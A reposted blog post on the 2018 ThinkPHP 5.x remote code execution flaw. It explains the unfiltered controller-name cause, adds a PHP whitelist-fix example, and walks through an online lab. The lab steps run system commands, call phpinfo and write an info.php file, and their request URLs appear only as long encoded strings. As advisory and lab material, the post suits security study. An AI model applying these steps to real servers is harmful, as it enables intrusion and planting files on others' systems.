[Repost] ThinkPHP 5.x (versions below v5.0.23 and v5.1.31) remote command execution vulnerability exploitation
Posted on: 2018-12-11 01:50
On 9 December 2018 the ThinkPHP project released an important security update that fixes a severe remote code execution vulnerability. Because the framework did not sufficiently check the controller name, a getshell vulnerability is possible when forced routing is not enabled. The affected versions include 5.0 and 5.1; upgrading to the latest version as soon as possible is recommended.

ThinkPHP v5.0.x patch address: 31eK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6@1L8%4m8Q4x3X3c8@1K9r3W2F1K9#2)9J5c8X3k6J5j5h3#2W2N6$3!0J5K9#2)9J5c8X3y4G2L8h3#2A6N6q4)9J5c8X3t1%4z5e0N6V1y4K6t1K6y4e0u0W2y4X3t1@1k6h3t1H3k6e0p5I4j5U0k6T1j5K6u0S2x3X3g2X3x3U0f1&6x3o6N6T1y4K6M7#2y4X3j5`.
ThinkPHP v5.1.x patch address: df6K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6@1L8%4m8Q4x3X3c8@1K9r3W2F1K9#2)9J5c8X3k6J5j5h3#2W2N6$3!0J5K9#2)9J5c8X3y4G2L8h3#2A6N6q4)9J5c8U0R3H3x3X3j5J5z5o6c8T1k6h3x3^5x3U0q4S2y4U0l9^5k6e0M7#2y4o6y4V1z5e0p5I4x3U0k6S2j5X3x3#2z5e0l9I4j5U0t1^5x3e0f1`.
Key code:
// Get the controller name
$controller = strip_tags($result[1] ?: $this->rule->getConfig('default_controller'));
Before the fix, the program did not filter the controller name, so an attacker could call arbitrary class methods by introducing the \ symbol.
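The root cause described above, as an added example that is not ThinkPHP's own code: the pre-fix handling of the controller segment (strip_tags only) beside a whitelist check of the kind the fix needs. The function names, the default controller value and the sample inputs are constructed for illustration.

```php
<?php
// Added example, not ThinkPHP's own code. Function names and inputs are constructed.

// Pre-fix handling as quoted on the page: strip_tags() removes HTML tags only, so a
// segment containing namespace separators ("\") passes through unchanged and is later
// resolved as a class name by the dispatcher.
function controllerBeforeFix(?string $segment, string $default = 'Index'): string
{
    return strip_tags($segment ?: $default);
}

// Hardened handling: the controller segment must look like a plain class identifier
// (a letter followed by word characters). A leading backslash or any namespace
// separator fails the whitelist and the request is rejected before dispatch.
function controllerAfterFix(?string $segment, string $default = 'Index'): string
{
    $controller = strip_tags($segment ?: $default);
    if (!preg_match('/^[A-Za-z]\w*$/', $controller)) {
        throw new InvalidArgumentException('controller not exists: ' . $controller);
    }
    return $controller;
}

// Constructed inputs: two ordinary controller names and two namespace-qualified ones.
$samples = ['index', 'User', '\Foo\Bar', 'app\index\controller\Index'];

foreach ($samples as $segment) {
    $before = controllerBeforeFix($segment);
    try {
        $after = controllerAfterFix($segment);
    } catch (InvalidArgumentException $e) {
        $after = 'rejected (' . $e->getMessage() . ')';
    }
    printf("%-30s before fix: %-30s after fix: %s\n", $segment, $before, $after);
}
```

The two namespace-qualified inputs survive strip_tags() unchanged but are rejected by the whitelist, which is the check the vulnerable code lacked.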
Exploitation
Online lab environment address: 557K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6%4N6%4N6Q4x3X3g2$3N6h3I4F1M7%4m8&6i4K6u0W2j5$3!0E0i4K6u0r3j5$3&6Q4x3X3c8@1K9r3W2F1K9%4m8Z5M7q4)9J5k6o6g2Q4x3X3g2^5i4K6u0V1M7X3y4W2i4K6u0r3
1. Click the START TO HACK button in the top-right corner to create the lab environment

2. Enter the lab environment

3. Execute a system command to display the files in the directory
a21K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4c8H3i4K6u0W2N6Y4y4H3L8r3q4@1k6g2)9J5k6h3#2W2i4K6u0r3M7s2g2T1L8r3W2U0i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6K6i4K6y4p5i4K6u0r3K9h3&6V1k6i4S2Q4x3V1k6Q4y4f1y4@1K9r3W2F1K9#2)9#2b7$3q4H3M7q4)9J5c8X3W2F1N6X3!0C8k6h3k6#2L8X3y4@1K9h3!0F1i4K6t1$3j5h3#2H3i4K6y4n7k6Y4g2F1j5%4c8A6L8$3&6Q4x3@1c8U0j5h3I4D9i4K6g2X3N6i4y4W2M7W2)9#2k6X3k6#2L8X3y4Q4y4h3k6S2M7Y4u0S2P5g2)9J5y4X3q4E0M7q4)9K6b7Y4k6S2M7Y4y4Q4y4f1t1H3i4K6g2p5i4K6y4p5M7%4W2K6N6r3g2E0i4K6t1$3j5h3#2H3i4K6y4n7N6X3q4J5M7#2)9#2b7U0q4Q4y4f1c8Q4y4f1u0Q4y4f1c8Q4x3@1c8D9M7#2)9J5y4e0t1H3i4K6u0V1L8l9`.`.

4. Execute phpinfo
3efK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4c8H3i4K6u0W2N6Y4y4H3L8r3q4@1k6g2)9J5k6h3#2W2i4K6u0r3M7s2g2T1L8r3W2U0i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6K6i4K6y4p5i4K6u0r3K9h3&6V1k6i4S2Q4x3V1k6Q4y4f1y4@1K9r3W2F1K9#2)9#2b7$3q4H3M7q4)9J5c8X3W2F1N6X3!0C8k6h3k6#2L8X3y4@1K9h3!0F1i4K6t1$3j5h3#2H3i4K6y4n7k6Y4g2F1j5%4c8A6L8$3&6Q4x3@1c8U0j5h3I4D9i4K6g2X3N6i4y4W2M7W2)9#2k6X3k6#2L8X3y4Q4y4h3k6S2M7Y4u0S2P5g2)9J5y4X3q4E0M7q4)9K6b7Y4k6S2M7Y4y4Q4y4f1t1H3i4K6g2p5i4K6y4p5M7%4W2K6N6r3g2E0i4K6t1$3j5h3#2H3i4K6y4n7N6X3q4J5M7#2)9#2b7U0q4Q4y4f1c8Q4y4f1u0Q4y4f1c8Q4x3@1c8H3K9s2m8Q4x3U0f1J5x3q4)9J5k6s2u0Q4x3U0f1J5x3q4)9J5y4%4m8Z5M7r3W2F1k6X3!0Q4x3U0S2Q4x3U0W2Q4x3@1u0Q4x3U0M7`.
5. Write an info.php file
1daK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4c8H3i4K6u0W2N6Y4y4H3L8r3q4@1k6g2)9J5k6h3#2W2i4K6u0r3M7s2g2T1L8r3W2U0i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6K6i4K6y4p5i4K6u0r3K9h3&6V1k6i4S2Q4x3V1k6Q4y4f1y4@1K9r3W2F1K9#2)9#2b7$3q4H3M7q4)9J5c8X3W2F1N6X3!0C8k6h3k6#2L8X3y4@1K9h3!0F1i4K6t1$3j5h3#2H3i4K6y4n7k6Y4g2F1j5%4c8A6L8$3&6Q4x3@1c8U0j5h3I4D9i4K6g2X3N6i4y4W2M7W2)9#2k6X3k6#2L8X3y4Q4y4h3k6S2M7Y4u0S2P5g2)9J5y4X3q4E0M7q4)9K6b7Y4k6S2M7Y4y4Q4y4f1t1H3i4K6g2p5i4K6y4p5M7%4W2K6N6r3g2E0i4K6t1$3j5h3#2H3i4K6y4n7N6X3q4J5M7#2)9#2b7U0q4Q4y4f1c8Q4y4f1u0Q4y4f1c8Q4x3@1c8W2j5$3S2G2i4K6t1#2x3U0m8Q4x3U0f1J5y4#2)9J5y4X3I4@1i4K6y4n7i4K6y4r3M7r3S2H3i4K6t1#2x3U0m8H3K9s2m8A6L8X3k6G2i4K6t1^5i4K6t1&6i4K6y4n7i4K6y4r3i4K6t1$3k6%4c8Q4x3@1u0Q4x3U0f1J5y4#2)9J5y4e0t1H3i4K6t1$3k6%4c8Q4x3@1u0Q4x3U0f1J5x3r3W2F1k6X3!0Q4x3X3g2H3K9s2l9`.
Visit info.php
